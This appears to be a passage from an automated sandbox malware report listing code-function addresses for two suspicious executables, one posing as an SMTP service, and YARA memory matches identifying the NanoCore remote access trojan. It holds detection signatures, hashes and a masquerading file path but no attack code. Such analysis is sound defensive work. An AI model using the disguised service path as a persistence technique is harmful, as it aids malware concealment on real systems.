Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8ED8 4_2_002E8ED8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E96D0 4_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EAFA8 4_2_002EAFA8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002ED79C 4_2_002ED79C
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8BE0 4_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8BD0 4_2_002E8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DE058 5_2_002DE058
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC0C8 5_2_002DC0C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D43A0 5_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DB4B0 5_2_002DB4B0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D3788 5_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC186 5_2_002DC186
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D4458 5_2_002D4458
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDC2A 11_2_002EDC2A
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0098 11_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E5920 11_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EBD38 11_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E4D08 11_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E157F 11_2_002E157F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E3D8F 11_2_002E3D8F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E71C0 11_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E2670 11_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E36C8 11_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDF00 11_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E6300 11_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9430 11_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8068 11_2_002E8068
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9440 11_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8059 11_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EB8A8 11_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EB8B8 11_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E98B8 11_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0498 11_2_002E0498
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA8FA 11_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EBD27 11_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA920 11_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0501 11_2_002E0501
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E4168 11_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA970 11_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E5D80 11_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E266F 11_2_002E266F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9242 11_2_002E9242
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9250 11_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EC6B6 11_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EC6E8 11_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDEF2 11_2_002EDEF2
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E96C1 11_2_002E96C1
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8ED2 11_2_002E8ED2
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E96D0 11_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8BE0 11_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8BD0 11_2_002E8BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DC28 12_2_0059DC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00590098 12_2_00590098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00591553 12_2_00591553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00594D08 12_2_00594D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059BD38 12_2_0059BD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00595920 12_2_00595920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005971C0 12_2_005971C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00593D8E 12_2_00593D8E
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00592670 12_2_00592670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005936C8 12_2_005936C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DF00 12_2_0059DF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00596300 12_2_00596300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598059 12_2_00598059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599440 12_2_00599440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598068 12_2_00598068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599430 12_2_00599430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005904F9 12_2_005904F9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A8FA 12_2_0059A8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059B8B8 12_2_0059B8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005998B8 12_2_005998B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059B8A8 12_2_0059B8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A970 12_2_0059A970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00594168 12_2_00594168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A920 12_2_0059A920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059BD27 12_2_0059BD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00595D80 12_2_00595D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599250 12_2_00599250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599242 12_2_00599242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00592660 12_2_00592660
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005996D0 12_2_005996D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598ED2 12_2_00598ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C6CC 12_2_0059C6CC
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005996C1 12_2_005996C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DEF2 12_2_0059DEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C6E8 12_2_0059C6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005936B8 12_2_005936B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598BD0 12_2_00598BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598BE0 12_2_00598BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDC28 13_2_002BDC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B0098 13_2_002B0098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B5920 13_2_002B5920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BBD38 13_2_002BBD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B4D08 13_2_002B4D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B1553 13_2_002B1553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B3D81 13_2_002B3D81
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B71C0 13_2_002B71C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B2670 13_2_002B2670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B36C8 13_2_002B36C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDF00 13_2_002BDF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B6300 13_2_002B6300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9430 13_2_002B9430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8068 13_2_002B8068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9440 13_2_002B9440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8059 13_2_002B8059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BB8A8 13_2_002BB8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BB8B8 13_2_002BB8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B98B8 13_2_002B98B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B04FA 13_2_002B04FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA8FA 13_2_002BA8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA923 13_2_002BA923
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BBD27 13_2_002BBD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B4168 13_2_002B4168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA970 13_2_002BA970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B5D80 13_2_002B5D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9242 13_2_002B9242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9250 13_2_002B9250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC6A6 13_2_002BC6A6
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC6E8 13_2_002BC6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDEF2 13_2_002BDEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B96C1 13_2_002B96C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8ED2 13_2_002B8ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B96D0 13_2_002B96D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8BE0 13_2_002B8BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8BD0 13_2_002B8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D43A0 16_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D3788 16_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D4458 16_2_002D4458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003246C9 17_2_003246C9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003243A0 17_2_003243A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00323788 17_2_00323788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00324C78 17_2_00324C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00324458 17_2_00324458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_003943A0 18_2_003943A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00393788 18_2_00393788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00394C78 18_2_00394C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00394458 18_2_00394458
Yara signature match
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
